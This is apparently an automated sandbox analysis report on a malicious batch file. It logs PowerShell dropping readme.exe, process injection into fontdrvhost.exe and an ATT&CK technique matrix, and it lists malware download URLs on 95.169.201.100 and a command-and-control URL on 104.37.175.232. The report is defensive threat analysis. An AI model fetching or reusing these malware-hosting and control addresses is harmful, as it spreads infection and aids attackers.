                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004CE5B0 GetSystemTime,GetTimeZoneInformation,19_2_004CE5B0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004CE5B0 GetSystemTime,GetTimeZoneInformation,19_2_004CE5B0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004CB0E0 GetVersionExA,19_2_004CB0E0
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000018.00000002.1731697999.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.1625239698.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.1618499894.0000000000A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1634336997.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000018.00000002.1731697999.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.1625239698.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.1618499894.0000000000A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1634336997.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts11
                      Windows Management Instrumentation
                      1
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      21
                      Input Capture
                      2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      11
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory1
                      File and Directory Discovery
                      Remote Desktop Protocol21
                      Input Capture
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Command and Scripting Interpreter
                      1
                      Registry Run Keys / Startup Folder
                      1
                      Registry Run Keys / Startup Folder
                      3
                      Obfuscated Files or Information
                      Security Account Manager145
                      System Information Discovery
                      SMB/Windows Admin Shares3
                      Clipboard Data
                      11
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      PowerShell
                      Login HookLogin Hook1
                      DLL Side-Loading
                      NTDS331
                      Security Software Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Masquerading
                      LSA Secrets1
                      Process Discovery
                      SSHKeylogging124
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials41
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                      Process Injection
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1568256 Sample: 098aPtSbmd.bat Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 72 Suricata IDS alerts for network traffic 2->72 74 Found malware configuration 2->74 76 Antivirus detection for URL or domain 2->76 78 6 other signatures 2->78 11 cmd.exe 1 2->11         started        14 msedge.exe 66 389 2->14         started        17 svchost.exe 1 2 2->17         started        process3 dnsIp4 92 Suspicious powershell command line found 11->92 19 powershell.exe 14 31 11->19         started        24 conhost.exe 11->24         started        66 192.168.2.7, 18960, 443, 49700 unknown unknown 14->66 68 239.255.255.250 unknown Reserved 14->68 26 msedge.exe 22 14->26         started        28 msedge.exe 14->28         started        30 msedge.exe 14->30         started        32 2 other processes 14->32 70 127.0.0.1 unknown unknown 17->70 signatures5 process6 dnsIp7 56 95.169.201.100, 18960, 49701 GOBULNETBG Bulgaria 19->56 54 C:\Users\user\AppData\Local\Temp\readme.exe, PE32 19->54 dropped 88 Loading BitLocker PowerShell Module 19->88 90 Powershell drops PE file 19->90 34 readme.exe 19->34         started        38 msedge.exe 7 19->38         started        58 13.107.246.40 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 26->58 60 b-0005.b-dc-msedge.net 13.107.9.158 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 26->60 62 8 other IPs or domains 26->62 file8 signatures9 process10 file11 52 C:\Users\user\Videos\...\DiskTuner.exe, PE32 34->52 dropped 80 Multi AV Scanner detection for dropped file 34->80 82 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 34->82 84 Drops large PE files 34->84 86 2 other signatures 34->86 40 readme.exe 34->40         started        signatures12 process13 process14 42 fontdrvhost.exe 40->42         started        46 WerFault.exe 40->46         started        dnsIp15 64 104.37.175.232 MAJESTIC-HOSTING-01US United States 42->64 94 Switches to a custom stack to bypass stack traces 42->94 48 fontdrvhost.exe 42->48         started        signatures16 process17 process18 50 WerFault.exe 48->50         started       

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      098aPtSbmd.bat11%ReversingLabs
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\readme.exe21%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://www.microsoft.T0%Avira URL Cloudsafe
                      http://95.169.201.100:18960/uploads/team-1/readme.pdf100%Avira URL Cloudmalware
                      http://95.10%Avira URL Cloudsafe
                      http://95.169.201.100:189600%Avira URL Cloudsafe
                      http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp0%Avira URL Cloudsafe
                      http://.macromedia.com/support/flashplayer/sys/https://SettingsSubdomainmms.cfgdefaultAuthorLocalSec0%Avira URL Cloudsafe
                      https://permanently-removed.invalid/x0%Avira URL Cloudsafe
                      https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihuskernelbasentdllkernel32GetProcessMitig0%Avira URL Cloudsafe
                      http://%shttp://a.SharedObject.BadPersistencependingSharedObject.UriMismatch0%Avira URL Cloudsafe
                      http://95.169.201.100:18960/uploads/team-1/readme.exe100%Avira URL Cloudmalware
                      https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihusx0%Avira URL Cloudsafe
                      https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihus0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      fg.microsoft.map.fastly.net
                      199.232.210.172
                      truefalse
                        high
                        chrome.cloudflare-dns.com
                        162.159.61.3
                        truefalse
                          high
                          ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                          94.245.104.56
                          truefalse
                            high
                            b-0005.b-dc-msedge.net
                            13.107.9.158
                            truefalse
                              high
                              googlehosted.l.googleusercontent.com
                              142.250.181.129
                              truefalse
                                high
                                clients2.googleusercontent.com
                                unknown
                                unknownfalse
                                  high
                                  bzib.nelreports.net
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crxfalse
                                      high
                                      http://95.169.201.100:18960/uploads/team-1/readme.pdftrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://chrome.cloudflare-dns.com/dns-queryfalse
                                        high
                                        https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihustrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://permanently-removed.invalid/embedded/reauth/chromeosmsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.macromedia.comreadme.exe, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drfalse
                                              high
                                              http://%shttp://a.SharedObject.BadPersistencependingSharedObject.UriMismatchreadme.exe, 00000013.00000002.1650378613.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000013.00000000.1437712543.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://designerapp-int.azurewebsites.net/msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000003.00000002.1499261908.000001D951A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Licensepowershell.exe, 00000003.00000002.1489711504.000001D9497EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://designerapp.azurewebsites.net/net//msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
